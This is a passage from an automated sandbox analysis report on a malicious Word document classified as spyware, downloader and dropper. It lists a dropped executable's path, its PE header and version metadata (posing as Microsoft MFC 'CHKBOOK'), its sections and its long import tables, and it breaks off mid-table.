VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Spyware, Downloader, Dropper
INC_4807280588838_XJ.doc
Word Document
Created at 2019-09-16T11:04:00
Remarks
(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filename | Category | Type | Severity |
---|---|---|---|
C:\Users\aETAdzjz\AppData\Local\structsstructs\structsstructs.exe | Dropped File | Binary | Suspicious |
File Reputation Information
Severity | Suspicious |
First Seen | 2019-09-16 12:00 (UTC+2) |
Last Seen | 2019-09-16 12:12 (UTC+2) |
PE Information
Image Base | 0x400000 |
Entry Point | 0x42e095 |
Size Of Code | 0x45a00 |
Size Of Initialized Data | 0x33200 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2019-09-16 05:31:32+00:00 |
Version Information (8)
CompanyName | MFC |
FileDescription | CHKBOOK |
FileVersion | 1, 0, 0, 1 |
InternalName | CHKBOOK |
LegalCopyright | © Microsoft Corporation. All rights reserved. |
OriginalFilename | CHKBOOK.exe |
ProductName | MFC CHKBOOK |
ProductVersion | 1, 0, 0, 1 |
Sections (4)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x45955 | 0x45a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.54 |
.rdata | 0x447000 | 0x131f0 | 0x13200 | 0x45e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.08 |
.data | 0x45b000 | 0x66b8 | 0x2a00 | 0x59000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.07 |
.rsrc | 0x462000 | 0x1d4dc | 0x1d600 | 0x5ba00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.19 |
Imports (10)
KERNEL32.dll (142)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileType | 0x0 | 0x447174 | 0x58058 | 0x56e58 | 0x1d7 |
GetStartupInfoA | 0x0 | 0x447178 | 0x5805c | 0x56e5c | 0x239 |
HeapCreate | 0x0 | 0x44717c | 0x58060 | 0x56e60 | 0x29f |
VirtualFree | 0x0 | 0x447180 | 0x58064 | 0x56e64 | 0x457 |
QueryPerformanceCounter | 0x0 | 0x447184 | 0x58068 | 0x56e68 | 0x354 |
TerminateProcess | 0x0 | 0x447188 | 0x5806c | 0x56e6c | 0x42d |
UnhandledExceptionFilter | 0x0 | 0x44718c | 0x58070 | 0x56e70 | 0x43e |
IsDebuggerPresent | 0x0 | 0x447190 | 0x58074 | 0x56e74 | 0x2d1 |
GetTimeZoneInformation | 0x0 | 0x447194 | 0x58078 | 0x56e78 | 0x26b |
GetCPInfo | 0x0 | 0x447198 | 0x5807c | 0x56e7c | 0x15b |
GetACP | 0x0 | 0x44719c | 0x58080 | 0x56e80 | 0x152 |
GetOEMCP | 0x0 | 0x4471a0 | 0x58084 | 0x56e84 | 0x213 |
IsValidCodePage | 0x0 | 0x4471a4 | 0x58088 | 0x56e88 | 0x2db |
GetTimeFormatA | 0x0 | 0x4471a8 | 0x5808c | 0x56e8c | 0x268 |
GetDateFormatA | 0x0 | 0x4471ac | 0x58090 | 0x56e90 | 0x1ae |
SetHandleCount | 0x0 | 0x4471b0 | 0x58094 | 0x56e94 | 0x3e8 |
GetConsoleCP | 0x0 | 0x4471b4 | 0x58098 | 0x56e98 | 0x183 |
GetConsoleMode | 0x0 | 0x4471b8 | 0x5809c | 0x56e9c | 0x195 |
LCMapStringA | 0x0 | 0x4471bc | 0x580a0 | 0x56ea0 | 0x2e1 |
LCMapStringW | 0x0 | 0x4471c0 | 0x580a4 | 0x56ea4 | 0x2e3 |
GetStringTypeA | 0x0 | 0x4471c4 | 0x580a8 | 0x56ea8 | 0x23d |
GetStringTypeW | 0x0 | 0x4471c8 | 0x580ac | 0x56eac | 0x240 |
GetLocaleInfoA | 0x0 | 0x4471cc | 0x580b0 | 0x56eb0 | 0x1e8 |
SetStdHandle | 0x0 | 0x4471d0 | 0x580b4 | 0x56eb4 | 0x3fc |
WriteConsoleA | 0x0 | 0x4471d4 | 0x580b8 | 0x56eb8 | 0x482 |
GetConsoleOutputCP | 0x0 | 0x4471d8 | 0x580bc | 0x56ebc | 0x199 |
WriteConsoleW | 0x0 | 0x4471dc | 0x580c0 | 0x56ec0 | 0x48c |
CreateFileA | 0x0 | 0x4471e0 | 0x580c4 | 0x56ec4 | 0x78 |
SetEnvironmentVariableA | 0x0 | 0x4471e4 | 0x580c8 | 0x56ec8 | 0x3d0 |
GetCommandLineW | 0x0 | 0x4471e8 | 0x580cc | 0x56ecc | 0x170 |
GetEnvironmentStringsW | 0x0 | 0x4471ec | 0x580d0 | 0x56ed0 | 0x1c1 |
FreeEnvironmentStringsW | 0x0 | 0x4471f0 | 0x580d4 | 0x56ed4 | 0x14b |
FindResourceW | 0x0 | 0x4471f4 | 0x580d8 | 0x56ed8 | 0x139 |
GetModuleFileNameA | 0x0 | 0x4471f8 | 0x580dc | 0x56edc | 0x1f4 |
GetStdHandle | 0x0 | 0x4471fc | 0x580e0 | 0x56ee0 | 0x23b |
SetUnhandledExceptionFilter | 0x0 | 0x447200 | 0x580e4 | 0x56ee4 | 0x415 |
VirtualAlloc | 0x0 | 0x447204 | 0x580e8 | 0x56ee8 | 0x454 |
HeapSize | 0x0 | 0x447208 | 0x580ec | 0x56eec | 0x2a6 |
ExitProcess | 0x0 | 0x44720c | 0x580f0 | 0x56ef0 | 0x104 |
Sleep | 0x0 | 0x447210 | 0x580f4 | 0x56ef4 | 0x421 |
RaiseException | 0x0 | 0x447214 | 0x580f8 | 0x56ef8 | 0x35a |
RtlUnwind | 0x0 | 0x447218 | 0x580fc | 0x56efc | 0x392 |
HeapReAlloc | 0x0 | 0x44721c | 0x58100 | 0x56f00 | 0x2a4 |
HeapAlloc | 0x0 | 0x447220 | 0x58104 | 0x56f04 | 0x29d |
GetSystemTimeAsFileTime | 0x0 | 0x447224 | 0x58108 | 0x56f08 | 0x24f |
HeapFree | 0x0 | 0x447228 | 0x5810c | 0x56f0c | 0x2a1 |
GetStartupInfoW | 0x0 | 0x44722c | 0x58110 | 0x56f10 | 0x23a |
GetTickCount | 0x0 | 0x447230 | 0x58114 | 0x56f14 | 0x266 |
SetErrorMode | 0x0 | 0x447234 | 0x58118 | 0x56f18 | 0x3d2 |
GetCurrentDirectoryW | 0x0 | 0x447238 | 0x5811c | 0x56f1c | 0x1a8 |
InterlockedIncrement | 0x0 | 0x44723c | 0x58120 | 0x56f20 | 0x2c0 |
TlsFree | 0x0 | 0x447240 | 0x58124 | 0x56f24 | 0x433 |
LocalReAlloc | 0x0 | 0x447244 | 0x58128 | 0x56f28 | 0x300 |
TlsSetValue | 0x0 | 0x447248 | 0x5812c | 0x56f2c | 0x435 |
TlsAlloc | 0x0 | 0x44724c | 0x58130 | 0x56f30 | 0x432 |
GlobalHandle | 0x0 | 0x447250 | 0x58134 | 0x56f34 | 0x28f |
GlobalReAlloc | 0x0 | 0x447254 | 0x58138 | 0x56f38 | 0x293 |
TlsGetValue | 0x0 | 0x447258 | 0x5813c | 0x56f3c | 0x434 |
LocalAlloc | 0x0 | 0x44725c | 0x58140 | 0x56f40 | 0x2f9 |
lstrlenA | 0x0 | 0x447260 | 0x58144 | 0x56f44 | 0x4b5 |
GlobalFlags | 0x0 | 0x447264 | 0x58148 | 0x56f48 | 0x28b |
EnterCriticalSection | 0x0 | 0x447268 | 0x5814c | 0x56f4c | 0xd9 |
LeaveCriticalSection | 0x0 | 0x44726c | 0x58150 | 0x56f50 | 0x2ef |
DeleteCriticalSection | 0x0 | 0x447270 | 0x58154 | 0x56f54 | 0xbe |
InitializeCriticalSection | 0x0 | 0x447274 | 0x58158 | 0x56f58 | 0x2b4 |
InterlockedDecrement | 0x0 | 0x447278 | 0x5815c | 0x56f5c | 0x2bc |
GetFileSizeEx | 0x0 | 0x44727c | 0x58160 | 0x56f60 | 0x1d5 |
SystemTimeToFileTime | 0x0 | 0x447280 | 0x58164 | 0x56f64 | 0x42a |
LocalFileTimeToFileTime | 0x0 | 0x447284 | 0x58168 | 0x56f68 | 0x2fb |
FileTimeToLocalFileTime | 0x0 | 0x447288 | 0x5816c | 0x56f6c | 0x10f |
FileTimeToSystemTime | 0x0 | 0x44728c | 0x58170 | 0x56f70 | 0x110 |
CreateFileW | 0x0 | 0x447290 | 0x58174 | 0x56f74 | 0x7f |
GetShortPathNameW | 0x0 | 0x447294 | 0x58178 | 0x56f78 | 0x238 |
GetVolumeInformationW | 0x0 | 0x447298 | 0x5817c | 0x56f7c | 0x279 |
FindFirstFileW | 0x0 | 0x44729c | 0x58180 | 0x56f80 | 0x124 |
FindClose | 0x0 | 0x4472a0 | 0x58184 | 0x56f84 | 0x119 |
GetCurrentProcess | 0x0 | 0x4472a4 | 0x58188 | 0x56f88 | 0x1a9 |
DuplicateHandle | 0x0 | 0x4472a8 | 0x5818c | 0x56f8c | 0xd4 |
CloseHandle | 0x0 | 0x4472ac | 0x58190 | 0x56f90 | 0x43 |
GetFileSize | 0x0 | 0x4472b0 | 0x58194 | 0x56f94 | 0x1d4 |
SetEndOfFile | 0x0 | 0x4472b4 | 0x58198 | 0x56f98 | 0x3cd |
UnlockFile | 0x0 | 0x4472b8 | 0x5819c | 0x56f9c | 0x43f |
LockFile | 0x0 | 0x4472bc | 0x581a0 | 0x56fa0 | 0x305 |
FlushFileBuffers | 0x0 | 0x4472c0 | 0x581a4 | 0x56fa4 | 0x141 |
SetFilePointer | 0x0 | 0x4472c4 | 0x581a8 | 0x56fa8 | 0x3df |
WriteFile | 0x0 | 0x4472c8 | 0x581ac | 0x56fac | 0x48d |
ReadFile | 0x0 | 0x4472cc | 0x581b0 | 0x56fb0 | 0x368 |
lstrcmpiW | 0x0 | 0x4472d0 | 0x581b4 | 0x56fb4 | 0x4ad |
GetThreadLocale | 0x0 | 0x4472d4 | 0x581b8 | 0x56fb8 | 0x25f |
GetStringTypeExW | 0x0 | 0x4472d8 | 0x581bc | 0x56fbc | 0x23f |
DeleteFileW | 0x0 | 0x4472dc | 0x581c0 | 0x56fc0 | 0xc3 |
MoveFileW | 0x0 | 0x4472e0 | 0x581c4 | 0x56fc4 | 0x316 |
GetPrivateProfileStringW | 0x0 | 0x4472e4 | 0x581c8 | 0x56fc8 | 0x21d |
WritePrivateProfileStringW | 0x0 | 0x4472e8 | 0x581cc | 0x56fcc | 0x493 |
GetPrivateProfileIntW | 0x0 | 0x4472ec | 0x581d0 | 0x56fd0 | 0x217 |
GetCurrentThread | 0x0 | 0x4472f0 | 0x581d4 | 0x56fd4 | 0x1ac |
ConvertDefaultLocale | 0x0 | 0x4472f4 | 0x581d8 | 0x56fd8 | 0x5a |
EnumResourceLanguagesW | 0x0 | 0x4472f8 | 0x581dc | 0x56fdc | 0xe9 |
lstrcmpA | 0x0 | 0x4472fc | 0x581e0 | 0x56fe0 | 0x4a9 |
GetLocaleInfoW | 0x0 | 0x447300 | 0x581e4 | 0x56fe4 | 0x1ea |
CompareStringA | 0x0 | 0x447304 | 0x581e8 | 0x56fe8 | 0x52 |
InterlockedExchange | 0x0 | 0x447308 | 0x581ec | 0x56fec | 0x2bd |
GlobalGetAtomNameW | 0x0 | 0x44730c | 0x581f0 | 0x56ff0 | 0x28e |
GetDiskFreeSpaceW | 0x0 | 0x447310 | 0x581f4 | 0x56ff4 | 0x1b7 |
GetFullPathNameW | 0x0 | 0x447314 | 0x581f8 | 0x56ff8 | 0x1df |
GetTempFileNameW | 0x0 | 0x447318 | 0x581fc | 0x56ffc | 0x259 |
GetFileTime | 0x0 | 0x44731c | 0x58200 | 0x57000 | 0x1d6 |
SetFileTime | 0x0 | 0x447320 | 0x58204 | 0x57004 | 0x3e3 |
GetFileAttributesW | 0x0 | 0x447324 | 0x58208 | 0x57008 | 0x1ce |
FreeResource | 0x0 | 0x447328 | 0x5820c | 0x5700c | 0x14f |
GetCurrentThreadId | 0x0 | 0x44732c | 0x58210 | 0x57010 | 0x1ad |
GlobalAddAtomW | 0x0 | 0x447330 | 0x58214 | 0x57014 | 0x284 |
GlobalFindAtomW | 0x0 | 0x447334 | 0x58218 | 0x57018 | 0x289 |
GlobalDeleteAtom | 0x0 | 0x447338 | 0x5821c | 0x5701c | 0x287 |
GetVersionExW | 0x0 | 0x44733c | 0x58220 | 0x57020 | 0x276 |
LoadLibraryW | 0x0 | 0x447340 | 0x58224 | 0x57024 | 0x2f4 |
FreeLibrary | 0x0 | 0x447344 | 0x58228 | 0x57028 | 0x14c |
CompareStringW | 0x0 | 0x447348 | 0x5822c | 0x5702c | 0x55 |
LoadLibraryA | 0x0 | 0x44734c | 0x58230 | 0x57030 | 0x2f1 |
lstrcmpW | 0x0 | 0x447350 | 0x58234 | 0x57034 | 0x4aa |
GetModuleHandleW | 0x0 | 0x447354 | 0x58238 | 0x57038 | 0x1f9 |
GetVersionExA | 0x0 | 0x447358 | 0x5823c | 0x5703c | 0x275 |
GetModuleHandleA | 0x0 | 0x44735c | 0x58240 | 0x57040 | 0x1f6 |
GetProcAddress | 0x0 | 0x447360 | 0x58244 | 0x57044 | 0x220 |
GlobalFree | 0x0 | 0x447364 | 0x58248 | 0x57048 | 0x28c |
GlobalAlloc | 0x0 | 0x447368 | 0x5824c | 0x5704c | 0x285 |
GlobalLock | 0x0 | 0x44736c | 0x58250 | 0x57050 | 0x290 |
GlobalUnlock | 0x0 | 0x447370 | 0x58254 | 0x57054 | 0x297 |
FormatMessageW | 0x0 | 0x447374 | 0x58258 | 0x57058 | 0x148 |
LocalFree | 0x0 | 0x447378 | 0x5825c | 0x5705c | 0x2fd |
lstrlenW | 0x0 | 0x44737c | 0x58260 | 0x57060 | 0x4b6 |
MulDiv | 0x0 | 0x447380 | 0x58264 | 0x57064 | 0x319 |
GetCurrentProcessId | 0x0 | 0x447384 | 0x58268 | 0x57068 | 0x1aa |
GetModuleFileNameW | 0x0 | 0x447388 | 0x5826c | 0x5706c | 0x1f5 |
GetLastError | 0x0 | 0x44738c | 0x58270 | 0x57070 | 0x1e6 |
SetLastError | 0x0 | 0x447390 | 0x58274 | 0x57074 | 0x3ec |
WideCharToMultiByte | 0x0 | 0x447394 | 0x58278 | 0x57078 | 0x47a |
LockResource | 0x0 | 0x447398 | 0x5827c | 0x5707c | 0x307 |
MultiByteToWideChar | 0x0 | 0x44739c | 0x58280 | 0x57080 | 0x31a |
SizeofResource | 0x0 | 0x4473a0 | 0x58284 | 0x57084 | 0x420 |
LoadResource | 0x0 | 0x4473a4 | 0x58288 | 0x57088 | 0x2f6 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x4473a8 | 0x5828c | 0x5708c | 0x2b5 |
USER32.dll (163)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegisterClipboardFormatW | 0x0 | 0x4473f4 | 0x582d8 | 0x570d8 | 0x238 |
DeleteMenu | 0x0 | 0x4473f8 | 0x582dc | 0x570dc | 0x98 |
GetMenuItemInfoW | 0x0 | 0x4473fc | 0x582e0 | 0x570e0 | 0x145 |
InflateRect | 0x0 | 0x447400 | 0x582e4 | 0x570e4 | 0x1a1 |
GetSysColorBrush | 0x0 | 0x447404 | 0x582e8 | 0x570e8 | 0x16d |
DestroyCursor | 0x0 | 0x447408 | 0x582ec | 0x570ec | 0x9c |
SetRect | 0x0 | 0x44740c | 0x582f0 | 0x570f0 | 0x291 |
IsZoomed | 0x0 | 0x447410 | 0x582f4 | 0x570f4 | 0x1cc |
CreateDialogIndirectParamW | 0x0 | 0x447414 | 0x582f8 | 0x570f8 | 0x5b |
GetNextDlgTabItem | 0x0 | 0x447418 | 0x582fc | 0x570fc | 0x153 |
EndDialog | 0x0 | 0x44741c | 0x58300 | 0x57100 | 0xd3 |
GetMessageW | 0x0 | 0x447420 | 0x58304 | 0x57104 | 0x14e |
TranslateMessage | 0x0 | 0x447424 | 0x58308 | 0x57108 | 0x2d5 |
ValidateRect | 0x0 | 0x447428 | 0x5830c | 0x5710c | 0x2f2 |
CharUpperW | 0x0 | 0x44742c | 0x58310 | 0x57110 | 0x3a |
ShowOwnedPopups | 0x0 | 0x447430 | 0x58314 | 0x57114 | 0x2b4 |
PostQuitMessage | 0x0 | 0x447434 | 0x58318 | 0x57118 | 0x220 |
UnpackDDElParam | 0x0 | 0x447438 | 0x5831c | 0x5711c | 0x2dd |
ReuseDDElParam | 0x0 | 0x44743c | 0x58320 | 0x57120 | 0x253 |
LoadMenuW | 0x0 | 0x447440 | 0x58324 | 0x57124 | 0x1e1 |
DestroyMenu | 0x0 | 0x447444 | 0x58328 | 0x57128 | 0x9e |
LoadAcceleratorsW | 0x0 | 0x447448 | 0x5832c | 0x5712c | 0x1cf |
InsertMenuItemW | 0x0 | 0x44744c | 0x58330 | 0x57130 | 0x1a5 |
SetRectEmpty | 0x0 | 0x447450 | 0x58334 | 0x57134 | 0x292 |
GetDesktopWindow | 0x0 | 0x447454 | 0x58338 | 0x57138 | 0x11c |
RedrawWindow | 0x0 | 0x447458 | 0x5833c | 0x5713c | 0x232 |
TranslateAcceleratorW | 0x0 | 0x44745c | 0x58340 | 0x57140 | 0x2d3 |
TranslateMDISysAccel | 0x0 | 0x447460 | 0x58344 | 0x57144 | 0x2d4 |
BringWindowToTop | 0x0 | 0x447464 | 0x58348 | 0x57148 | 0x10 |
GetActiveWindow | 0x0 | 0x447468 | 0x5834c | 0x5714c | 0xf9 |
DrawMenuBar | 0x0 | 0x44746c | 0x58350 | 0x57150 | 0xc1 |
DefMDIChildProcW | 0x0 | 0x447470 | 0x58354 | 0x57154 | 0x93 |
DefFrameProcW | 0x0 | 0x447474 | 0x58358 | 0x57158 | 0x91 |
ShowWindow | 0x0 | 0x447478 | 0x5835c | 0x5715c | 0x2b8 |
IsDialogMessageW | 0x0 | 0x44747c | 0x58360 | 0x57160 | 0x1b9 |
SetDlgItemTextW | 0x0 | 0x447480 | 0x58364 | 0x57164 | 0x277 |
RegisterWindowMessageW | 0x0 | 0x447484 | 0x58368 | 0x57168 | 0x24a |
LoadIconW | 0x0 | 0x447488 | 0x5836c | 0x5716c | 0x1d7 |
SendDlgItemMessageW | 0x0 | 0x44748c | 0x58370 | 0x57170 | 0x25a |
SendDlgItemMessageA | 0x0 | 0x447490 | 0x58374 | 0x57174 | 0x259 |
WinHelpW | 0x0 | 0x447494 | 0x58378 | 0x57178 | 0x300 |
GetCapture | 0x0 | 0x447498 | 0x5837c | 0x5717c | 0x101 |
SetWindowsHookExW | 0x0 | 0x44749c | 0x58380 | 0x57180 | 0x2b0 |
CallNextHookEx | 0x0 | 0x4474a0 | 0x58384 | 0x57184 | 0x1b |
GetClassLongW | 0x0 | 0x4474a4 | 0x58388 | 0x57188 | 0x109 |
GetClassNameW | 0x0 | 0x4474a8 | 0x5838c | 0x5718c | 0x10b |
SetPropW | 0x0 | 0x4474ac | 0x58390 | 0x57190 | 0x290 |
GetPropW | 0x0 | 0x4474b0 | 0x58394 | 0x57194 | 0x15c |
RemovePropW | 0x0 | 0x4474b4 | 0x58398 | 0x57198 | 0x250 |
IsWindow | 0x0 | 0x4474b8 | 0x5839c | 0x5719c | 0x1c5 |
SetFocus | 0x0 | 0x4474bc | 0x583a0 | 0x571a0 | 0x279 |
GetForegroundWindow | 0x0 | 0x4474c0 | 0x583a4 | 0x571a4 | 0x125 |
SetActiveWindow | 0x0 | 0x4474c4 | 0x583a8 | 0x571a8 | 0x266 |
DispatchMessageW | 0x0 | 0x4474c8 | 0x583ac | 0x571ac | 0xa9 |
BeginDeferWindowPos | 0x0 | 0x4474cc | 0x583b0 | 0x571b0 | 0xd |
EndDeferWindowPos | 0x0 | 0x4474d0 | 0x583b4 | 0x571b4 | 0xd2 |
GetDlgItem | 0x0 | 0x4474d4 | 0x583b8 | 0x571b8 | 0x11f |
GetTopWindow | 0x0 | 0x4474d8 | 0x583bc | 0x571bc | 0x175 |
DestroyWindow | 0x0 | 0x4474dc | 0x583c0 | 0x571c0 | 0xa0 |
UnhookWindowsHookEx | 0x0 | 0x4474e0 | 0x583c4 | 0x571c4 | 0x2d9 |
GetMessageTime | 0x0 | 0x4474e4 | 0x583c8 | 0x571c8 | 0x14d |
GetMessagePos | 0x0 | 0x4474e8 | 0x583cc | 0x571cc | 0x14c |
PeekMessageW | 0x0 | 0x4474ec | 0x583d0 | 0x571d0 | 0x21c |
MapWindowPoints | 0x0 | 0x4474f0 | 0x583d4 | 0x571d4 | 0x1f3 |
ScrollWindow | 0x0 | 0x4474f4 | 0x583d8 | 0x571d8 | 0x257 |
TrackPopupMenu | 0x0 | 0x4474f8 | 0x583dc | 0x571dc | 0x2cf |
GetKeyState | 0x0 | 0x4474fc | 0x583e0 | 0x571e0 | 0x131 |
SetMenu | 0x0 | 0x447500 | 0x583e4 | 0x571e4 | 0x27f |
SetScrollRange | 0x0 | 0x447504 | 0x583e8 | 0x571e8 | 0x295 |
GetScrollRange | 0x0 | 0x447508 | 0x583ec | 0x571ec | 0x168 |
SetScrollPos | 0x0 | 0x44750c | 0x583f0 | 0x571f0 | 0x294 |
GetScrollPos | 0x0 | 0x447510 | 0x583f4 | 0x571f4 | 0x167 |
SetForegroundWindow | 0x0 | 0x447514 | 0x583f8 | 0x571f8 | 0x27a |
ShowScrollBar | 0x0 | 0x447518 | 0x583fc | 0x571fc | 0x2b5 |
IsWindowVisible | 0x0 | 0x44751c | 0x58400 | 0x57200 | 0x1ca |
PostMessageW | 0x0 | 0x447520 | 0x58404 | 0x57204 | 0x21f |
CreateWindowExW | 0x0 | 0x447524 | 0x58408 | 0x57208 | 0x68 |
GetClassInfoExW | 0x0 | 0x447528 | 0x5840c | 0x5720c | 0x106 |
GetClassInfoW | 0x0 | 0x44752c | 0x58410 | 0x57210 | 0x107 |
RegisterClassW | 0x0 | 0x447530 | 0x58414 | 0x57214 | 0x236 |
EqualRect | 0x0 | 0x447534 | 0x58418 | 0x57218 | 0xec |
DeferWindowPos | 0x0 | 0x447538 | 0x5841c | 0x5721c | 0x97 |
GetScrollInfo | 0x0 | 0x44753c | 0x58420 | 0x57220 | 0x166 |
SetScrollInfo | 0x0 | 0x447540 | 0x58424 | 0x57224 | 0x293 |
CopyRect | 0x0 | 0x447544 | 0x58428 | 0x57228 | 0x4f |
DefWindowProcW | 0x0 | 0x447548 | 0x5842c | 0x5722c | 0x96 |
CallWindowProcW | 0x0 | 0x44754c | 0x58430 | 0x57230 | 0x1d |
GetMenu | 0x0 | 0x447550 | 0x58434 | 0x57234 | 0x13c |
SetWindowLongW | 0x0 | 0x447554 | 0x58438 | 0x57238 | 0x2a5 |
SetWindowPos | 0x0 | 0x447558 | 0x5843c | 0x5723c | 0x2a7 |
IntersectRect | 0x0 | 0x44755c | 0x58440 | 0x57240 | 0x1a9 |
SystemParametersInfoA | 0x0 | 0x447560 | 0x58444 | 0x57244 | 0x2c4 |
GetWindowPlacement | 0x0 | 0x447564 | 0x58448 | 0x57248 | 0x187 |
GetWindow | 0x0 | 0x447568 | 0x5844c | 0x5724c | 0x17d |
EndPaint | 0x0 | 0x44756c | 0x58450 | 0x57250 | 0xd5 |
BeginPaint | 0x0 | 0x447570 | 0x58454 | 0x57254 | 0xe |
GetWindowDC | 0x0 | 0x447574 | 0x58458 | 0x57258 | 0x17f |
ReleaseDC | 0x0 | 0x447578 | 0x5845c | 0x5725c | 0x24c |
GetDC | 0x0 | 0x44757c | 0x58460 | 0x57260 | 0x11a |
EnableWindow | 0x0 | 0x447580 | 0x58464 | 0x57264 | 0xd1 |
GetSysColor | 0x0 | 0x447584 | 0x58468 | 0x57268 | 0x16c |
InvalidateRect | 0x0 | 0x447588 | 0x5846c | 0x5726c | 0x1aa |
wsprintfW | 0x0 | 0x44758c | 0x58470 | 0x57270 | 0x308 |
FillRect | 0x0 | 0x447590 | 0x58474 | 0x57274 | 0xef |
ScreenToClient | 0x0 | 0x447594 | 0x58478 | 0x57278 | 0x254 |
GrayStringW | 0x0 | 0x447598 | 0x5847c | 0x5727c | 0x194 |
DrawTextExW | 0x0 | 0x44759c | 0x58480 | 0x57280 | 0xc7 |
DrawTextW | 0x0 | 0x4475a0 | 0x58484 | 0x57284 | 0xc8 |
TabbedTextOutW | 0x0 | 0x4475a4 | 0x58488 | 0x57288 | 0x2c7 |
GetMenuStringW | 0x0 | 0x4475a8 | 0x5848c | 0x5728c | 0x149 |
AppendMenuW | 0x0 | 0x4475ac | 0x58490 | 0x57290 | 0xa |
GetMenuItemID | 0x0 | 0x4475b0 | 0x58494 | 0x57294 | 0x143 |
InsertMenuW | 0x0 | 0x4475b4 | 0x58498 | 0x57298 | 0x1a6 |
GetMenuItemCount | 0x0 | 0x4475b8 | 0x5849c | 0x5729c | 0x142 |
GetSubMenu | 0x0 | 0x4475bc | 0x584a0 | 0x572a0 | 0x16b |
RemoveMenu | 0x0 | 0x4475c0 | 0x584a4 | 0x572a4 | 0x24e |
GetSystemMetrics | 0x0 | 0x4475c4 | 0x584a8 | 0x572a8 | 0x16f |
GetCursorPos | 0x0 | 0x4475c8 | 0x584ac | 0x572ac | 0x119 |
ReleaseCapture | 0x0 | 0x4475cc | 0x584b0 | 0x572b0 | 0x24b |
UnregisterClassW | 0x0 | 0x4475d0 | 0x584b4 | 0x572b4 | 0x2df |
GetTabbedTextExtentA | 0x0 | 0x4475d4 | 0x584b8 | 0x572b8 | 0x170 |
PostThreadMessageW | 0x0 | 0x4475d8 | 0x584bc | 0x572bc | 0x222 |
CreateMenu | 0x0 | 0x4475dc | 0x584c0 | 0x572c0 | 0x64 |
CopyAcceleratorTableW | 0x0 | 0x4475e0 | 0x584c4 | 0x572c4 | 0x4c |
WindowFromPoint | 0x0 | 0x4475e4 | 0x584c8 | 0x572c8 | 0x303 |
DestroyIcon | 0x0 | 0x4475e8 | 0x584cc | 0x572cc | 0x9d |
GetWindowTextLengthW | 0x0 | 0x4475ec | 0x584d0 | 0x572d0 | 0x18e |
SendMessageW | 0x0 | 0x4475f0 | 0x584d4 | 0x572d4 | 0x263 |
UpdateWindow | 0x0 | 0x4475f4 | 0x584d8 | 0x572d8 | 0x2e9 |
SetWindowTextW | 0x0 | 0x4475f8 | 0x584dc | 0x572dc | 0x2ac |
GetWindowTextW | 0x0 | 0x4475fc | 0x584e0 | 0x572e0 | 0x18f |
GetClientRect | 0x0 | 0x447600 | 0x584e4 | 0x572e4 | 0x10d |
CheckMenuItem | 0x0 | 0x447604 | 0x584e8 | 0x572e8 | 0x3d |
EnableMenuItem | 0x0 | 0x447608 | 0x584ec | 0x572ec | 0xcf |
GetMenuState | 0x0 | 0x44760c | 0x584f0 | 0x572f0 | 0x147 |
ModifyMenuW | 0x0 | 0x447610 | 0x584f4 | 0x572f4 | 0x201 |
GetParent | 0x0 | 0x447614 | 0x584f8 | 0x572f8 | 0x155 |
GetFocus | 0x0 | 0x447618 | 0x584fc | 0x572fc | 0x124 |
LoadBitmapW | 0x0 | 0x44761c | 0x58500 | 0x57300 | 0x1d1 |
GetMenuCheckMarkDimensions | 0x0 | 0x447620 | 0x58504 | 0x57304 | 0x13e |
SetMenuItemBitmaps | 0x0 | 0x447624 | 0x58508 | 0x57308 | 0x283 |
AdjustWindowRectEx | 0x0 | 0x447628 | 0x5850c | 0x5730c | 0x3 |
IsIconic | 0x0 | 0x44762c | 0x58510 | 0x57310 | 0x1bd |
IsChild | 0x0 | 0x447630 | 0x58514 | 0x57314 | 0x1b5 |
GetDlgCtrlID | 0x0 | 0x447634 | 0x58518 | 0x57318 | 0x11e |
MessageBoxW | 0x0 | 0x447638 | 0x5851c | 0x5731c | 0x1ff |
IsWindowEnabled | 0x0 | 0x44763c | 0x58520 | 0x57320 | 0x1c6 |
GetLastActivePopup | 0x0 | 0x447640 | 0x58524 | 0x57324 | 0x138 |
GetWindowLongW | 0x0 | 0x447644 | 0x58528 | 0x57328 | 0x182 |
GetWindowThreadProcessId | 0x0 | 0x447648 | 0x5852c | 0x5732c | 0x190 |
SystemParametersInfoW | 0x0 | 0x44764c | 0x58530 | 0x57330 | 0x2c5 |
OffsetRect | 0x0 | 0x447650 | 0x58534 | 0x57334 | 0x20e |
DrawIcon | 0x0 | 0x447654 | 0x58538 | 0x57338 | 0xbf |
SetWindowRgn | 0x0 | 0x447658 | 0x5853c | 0x5733c | 0x2a8 |
GetWindowRect | 0x0 | 0x44765c | 0x58540 | 0x57340 | 0x188 |
ClientToScreen | 0x0 | 0x447660 | 0x58544 | 0x57344 | 0x45 |
SetTimer | 0x0 | 0x447664 | 0x58548 | 0x57348 | 0x29e |
KillTimer | 0x0 | 0x447668 | 0x5854c | 0x5734c | 0x1cd |
SetCapture | 0x0 | 0x44766c | 0x58550 | 0x57350 | 0x267 |
PtInRect | 0x0 | 0x447670 | 0x58554 | 0x57354 | 0x229 |
LoadCursorW | 0x0 | 0x447674 | 0x58558 | 0x57358 | 0x1d5 |
SetCursor | 0x0 | 0x447678 | 0x5855c | 0x5735c | 0x270 |
CreatePopupMenu | 0x0 | 0x44767c | 0x58560 | 0x57360 | 0x65 |
GDI32.dll (75)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
ScaleWindowExtEx | 0x0 | 0x447044 | 0x57f28 | 0x56d28 | 0x259 |
GetCurrentPositionEx | 0x0 | 0x447048 | 0x57f2c | 0x56d2c | 0x1af |
